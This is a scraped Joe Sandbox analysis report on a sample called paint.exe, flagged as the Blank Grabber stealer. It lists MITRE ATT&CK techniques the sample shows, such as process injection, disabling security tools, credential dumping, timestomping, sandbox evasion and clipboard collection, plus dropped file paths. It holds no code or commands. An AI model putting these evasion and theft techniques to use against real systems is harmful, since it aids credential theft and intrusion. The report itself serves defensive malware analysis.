Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report paint.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Blank Grabber

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Data Obfuscation

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\?? ? ?? \Display (1).png

C:\Users\user\AppData\Local\Temp\MpCmdRun.log

C:\Users\user\AppData\Local\Temp\RES7663.tmp

C:\Users\user\AppData\Local\Temp\S7zJV.zip

C:\Users\user\AppData\Local\Temp\_MEI67162\VCRUNTIME140.dll

C:\Users\user\AppData\Local\Temp\_MEI67162\_bz2.pyd

C:\Users\user\AppData\Local\Temp\_MEI67162\_ctypes.pyd

Windows Analysis Report
paint.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre